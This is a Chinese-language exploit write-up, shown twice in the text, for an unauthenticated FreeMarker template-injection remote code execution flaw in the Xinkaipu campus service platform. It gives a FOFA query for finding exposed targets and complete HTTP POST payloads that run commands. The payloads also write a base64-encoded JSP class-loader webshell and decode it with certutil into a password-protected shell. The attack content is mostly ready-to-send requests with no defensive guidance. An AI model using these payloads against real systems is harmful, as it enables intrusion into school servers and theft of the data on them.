fofamini-wiki

登录白背景

源码

新开普掌上校园服务管理平台service.action存在远程命令执行漏洞

一、漏洞简介

新开普智慧校园体系基于业务、数据双中台理念，建立共享开放能力平台，实现能力开放和服务与数据的全生命周期治理；基于一云多端，混合云服务模式，覆盖管理、生活、教学、科研和社会化服务全场景，让师生随时随地获得资源和服务；围绕按主题建设，按场景上线，以评促建，可持续发展的路径，渐进建设全业务应用场景，让智慧校园建设更简单。新开普智慧校园系统/service transport/service.action接口处存在FreeMarker模板注入，攻击者可在未经身份认证的情况下，调用后台接口，构造恶意代码实现远程代码执行，最终可造成服务器失陷。

二、影响版本

新开普掌上校园服务管理平台

三、资产测绘

fofatitle="掌上校园服务管理平台"
特征

四、漏洞复现

访问如下连接出现如下页面可能存在漏洞

/service_transport/service.action

命令执行

POST /service_transport/service.action HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
 
{
        "command": "GetFZinfo", 
        "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
        ?new()>${ex(\"cmd /c whoami >./webapps/ROOT/1.txt\")}"
}

获取命令执行结果

/1.txt

写webshell

POST /service_transport/service.action HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
 
{
        "command": "GetFZinfo", 
        "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
        ?new()>${ex(\"cmd /c echo PCUhCiAgICBjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXIgewogICAgICAgIFUoQ2xhc3NMb2FkZXIgYykgewogICAgICAgICAgICBzdXBlcihjKTsKICAgICAgICB9CiAgICAgICAgcHVibGljIENsYXNzIGcoYnl0ZVtdIGIpIHsKICAgICAgICAgICAgcmV0dXJuIHN1cGVyLmRlZmluZUNsYXNzKGIsIDAsIGIubGVuZ3RoKTsKICAgICAgICB9CiAgICB9CiAKICAgIHB1YmxpYyBieXRlW10gYmFzZTY0RGVjb2RlKFN0cmluZyBzdHIpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RGVjb2RlciIpOwogICAgICAgICAgICByZXR1cm4gKGJ5dGVbXSkgY2xhenouZ2V0TWV0aG9kKCJkZWNvZGVCdWZmZXIiLCBTdHJpbmcuY2xhc3MpLmludm9rZShjbGF6ei5uZXdJbnN0YW5jZSgpLCBzdHIpOwogICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkJhc2U2NCIpOwogICAgICAgICAgICBPYmplY3QgZGVjb2RlciA9IGNsYXp6LmdldE1ldGhvZCgiZ2V0RGVjb2RlciIpLmludm9rZShudWxsKTsKICAgICAgICAgICAgcmV0dXJuIChieXRlW10pIGRlY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImRlY29kZSIsIFN0cmluZy5jbGFzcykuaW52b2tlKGRlY29kZXIsIHN0cik7CiAgICAgICAgfQogICAgfQolPgo8JQogICAgU3RyaW5nIGNscyA9IHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwYXNzd2QiKTsKICAgIGlmIChjbHMgIT0gbnVsbCkgewogICAgICAgIG5ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKGJhc2U2NERlY29kZShjbHMpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7CiAgICB9CiU+ >./webapps/ROOT/1.txt\")}"
}

解码

POST /service_transport/service.action HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
 
{
        "command": "GetFZinfo", 
        "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
        ?new()>${ex(\"cmd /c certutil -decode ./webapps/ROOT/1.txt ./webapps/ROOT/1.jsp\")}"
}

webshell地址，密码passwd

/1.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/acukes6f8k6xrz9w

# 新开普掌上校园服务管理平台service.action存在远程命令执行漏洞

# 一、漏洞简介
新开普智慧校园体系基于业务、数据双中台理念，建立共享开放能力平台，实现能力开放和服务与数据的全生命周期治理；基于一云多端，混合云服务模式，覆盖管理、生活、教学、科研和社会化服务全场景，让师生随时随地获得资源和服务；围绕按主题建设，按场景上线，以评促建，可持续发展的路径，渐进建设全业务应用场景，让智慧校园建设更简单。新开普智慧校园系统/service transport/service.action接口处存在FreeMarker模板注入，攻击者可在未经身份认证的情况下，调用后台接口，构造恶意代码实现远程代码执行，最终可造成服务器失陷。

# 二、影响版本

- 新开普掌上校园服务管理平台

# 三、资产测绘

- fofa`title="掌上校园服务管理平台"`
- 特征

![image.png](./img/l-WTDIs1wVWbJzY6/1711901947125-91afaba9-4c4d-4378-ba94-da54b6716549-082036.png)

# 四、漏洞复现

1. 访问如下连接出现如下页面可能存在漏洞
```
/service_transport/service.action
```
![image.png](./img/l-WTDIs1wVWbJzY6/1711901995273-3218ce3e-f4df-4114-b966-57e1399d82e4-898913.png)

2. 命令执行
```
POST /service_transport/service.action HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
 
{
        "command": "GetFZinfo", 
        "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
        ?new()>${ex(\"cmd /c whoami >./webapps/ROOT/1.txt\")}"
}
```
![image.png](./img/l-WTDIs1wVWbJzY6/1711902038721-a323161c-dcba-4303-8b6f-4a93dca22a14-033585.png)
获取命令执行结果
```
/1.txt
```
![image.png](./img/l-WTDIs1wVWbJzY6/1711902058168-c1950f96-f509-4230-a21e-aeb592bb225c-727414.png)

3. 写webshell
```
POST /service_transport/service.action HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
 
{
        "command": "GetFZinfo", 
        "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
        ?new()>${ex(\"cmd /c echo PCUhCiAgICBjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXIgewogICAgICAgIFUoQ2xhc3NMb2FkZXIgYykgewogICAgICAgICAgICBzdXBlcihjKTsKICAgICAgICB9CiAgICAgICAgcHVibGljIENsYXNzIGcoYnl0ZVtdIGIpIHsKICAgICAgICAgICAgcmV0dXJuIHN1cGVyLmRlZmluZUNsYXNzKGIsIDAsIGIubGVuZ3RoKTsKICAgICAgICB9CiAgICB9CiAKICAgIHB1YmxpYyBieXRlW10gYmFzZTY0RGVjb2RlKFN0cmluZyBzdHIpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RGVjb2RlciIpOwogICAgICAgICAgICByZXR1cm4gKGJ5dGVbXSkgY2xhenouZ2V0TWV0aG9kKCJkZWNvZGVCdWZmZXIiLCBTdHJpbmcuY2xhc3MpLmludm9rZShjbGF6ei5uZXdJbnN0YW5jZSgpLCBzdHIpOwogICAgICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7CiAgICAgICAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgiamF2YS51dGlsLkJhc2U2NCIpOwogICAgICAgICAgICBPYmplY3QgZGVjb2RlciA9IGNsYXp6LmdldE1ldGhvZCgiZ2V0RGVjb2RlciIpLmludm9rZShudWxsKTsKICAgICAgICAgICAgcmV0dXJuIChieXRlW10pIGRlY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImRlY29kZSIsIFN0cmluZy5jbGFzcykuaW52b2tlKGRlY29kZXIsIHN0cik7CiAgICAgICAgfQogICAgfQolPgo8JQogICAgU3RyaW5nIGNscyA9IHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwYXNzd2QiKTsKICAgIGlmIChjbHMgIT0gbnVsbCkgewogICAgICAgIG5ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKGJhc2U2NERlY29kZShjbHMpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7CiAgICB9CiU+ >./webapps/ROOT/1.txt\")}"
}
```
![image.png](./img/l-WTDIs1wVWbJzY6/1711902121361-65cb73a4-266b-417c-8b97-d00659fdf277-547344.png)
解码
```
POST /service_transport/service.action HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
 
{
        "command": "GetFZinfo", 
        "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
        ?new()>${ex(\"cmd /c certutil -decode ./webapps/ROOT/1.txt ./webapps/ROOT/1.jsp\")}"
}
```
![image.png](./img/l-WTDIs1wVWbJzY6/1711902172606-ce659991-5d47-4c56-b23c-3649b602ae78-405077.png)
webshell地址，密码passwd
```
/1.jsp
```
![image.png](./img/l-WTDIs1wVWbJzY6/1711902214954-35f0e854-670f-4e9d-bf14-56e6cb0ab815-023634.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/acukes6f8k6xrz9w>